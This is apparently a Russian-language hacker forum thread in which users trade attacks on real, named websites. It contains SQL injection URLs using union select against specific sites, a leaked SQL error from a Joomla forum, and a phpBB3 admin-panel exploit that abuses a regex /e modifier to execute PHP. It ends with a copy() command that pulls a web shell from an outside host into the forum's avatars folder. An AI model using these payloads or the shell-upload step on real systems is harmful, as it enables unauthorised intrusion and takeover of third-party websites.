имеется sql inj
если делаю чтонибудь наподобие:
то выводится ошибка:
что я не правильно делаю? как тут быть?

http://www.heimlichinstitute.org/page.php?id=-1+union+select+1,unhex(hex(VERSION())),3,4--
я первый!

http://www.heimlichinstitute.org/page.php?id=-1+union+select+1,unhex(hex(VERSION())),3,4--

add:
Raz0r,

Ребят, вот на первый взгляд SQL на сайте Онтона Усральского:
http://anton-uralskiy.ru/index.php?option=com_fireboard&Itemid=-1'+union+select+1/*

Пробовал по всякому, в начале подставлял и -1, и -1' и -1%27, -1%2527
В конце и /* потом # далее +-- и просто -- %23.

Но всё глухо, нигде нету "предложения" правильно указать колонки.
Я в этом не очень хорошо шарю, тут возможен вывод, или просто обычная ошибка?

Главная You have an error in your SQL syntax near \'union+select+1/*\', \'90.150.48.**\', \'0\')\' at line 1 SQL=INSERT INTO jos_fb_whoisonline (`userid` , `time`, `what`, `task`, `do`, `func`,`link`, `userip`, `user`) VALUES (\'0\', \'1227551255\', \'Главная\',\'\',\'\',\'\',\'/index.php?option=com_fireboard&Itemid=-1\'+union+select+1/*\', \'90.150.**.**\', \'0\')

Скуль в инсерте. Толку нету. Таблица бестолковая, да и magic_quotes_gpc = on. Можешь забить на неё.

нихрена там нет. Ищи на багтреках про жумлу

Вопрос такой... phpbb3 форум.. я задал тут вопрос как мне через админку залить шелл? ответили что через восстановление базы и в коде :UPDATE forum_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig=phpinfo() WHERE user_id=2;
Сработало однако )) Но вот незадача... я хз че дальше то делать. Что можно выполнить используя данный код. что то прописать в нем вместо phpinfo()? подскажите...

видимо, любую пхп комманду =)

Пиши пиши....
copy('http://sute.ru/shell.txt','/home/site/phpbb3/avatars/shell.php');
Примерно так... в первом параметре ссылку на шелл во втором полный путь до файла который создать.